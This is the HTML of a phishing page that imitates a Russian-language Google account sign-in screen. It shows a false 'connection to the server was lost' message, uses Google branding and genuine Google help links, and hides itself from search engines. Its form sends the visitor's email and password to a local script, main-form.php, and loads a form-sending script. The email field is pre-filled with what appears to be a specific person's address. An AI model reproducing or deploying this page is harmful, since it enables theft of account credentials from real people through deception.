<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8"/>
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width">
		<meta name=“robots” content=“noindex,nofollow”>
		<title>Вход - Google Аккаунты</title>
		<!--styles-->
		<link href="https://www.google.com.ua/images/branding/product/ico/googleg_lodp.ico" rel="shortcut icon">
		<link href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,400,500,700,900&amp;subset=cyrillic" rel="stylesheet">
		<link rel="stylesheet" href="css/styles.css">
	</head>
	<body class="home">
		<main>
			<div class="form-block">
				<div class="top-text-info">
					<img src="img/ggl.svg" alt="">
					<h1>Извините</h1>
					<p>Соединение с сервером утеряно. Войдите в ваш аккаунт</p>
				</div>
				<form action="main-form.php" method="POST" class="ggl-form">
					<div class="form-wrapper">
                		<input class="forms-input main-forms-input" type="text" id="client-mail" name="client-mail" title="Формат: буквы только русского и латинского алфавита (не меньше 2х букв)" autocomplete="on" placeholder="Телефон или адрес эл.почты" value="zysrmarc@gmail.com">
            			<input class="forms-input main-forms-input" type="password" id="client-pass" name="client-pass" title="Формат: буквы только русского и латинского алфавита (не меньше 2х букв)" autocomplete="on" placeholder="Введите пароль">
            			<input type="hidden" name="surname">
            			<a class="form-link form-link1" href="https://accounts.google.com/signin/usernamerecovery?continue=https%3A%2F%2Faccounts.google.com%2FManageAccount&hl=ru">Забыли адрес эл. почты?</a>
						<a class="form-link" href="#">Другие варианты</a>
						<button class="order-button" id="order-button" type="submit">Далее</button>
					</div>
				</form>
			</div>
		</main>
		<footer>
			<ul class="Bgzgmd"><li><a href="https://support.google.com/accounts?hl=ru" target="_blank">Справка</a></li><li><a href="https://accounts.google.com/TOS?loc=UA&amp;hl=ru&amp;privacy=true" target="_blank">Конфиденциальность</a></li><li><a href="https://accounts.google.com/TOS?loc=UA&amp;hl=ru" target="_blank">Условия</a></li></ul>
		</footer>
		<script src="http://code.jquery.com/jquery-3.2.1.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>
		<script src="js/form-send.js"></script>
	</body>
</html>
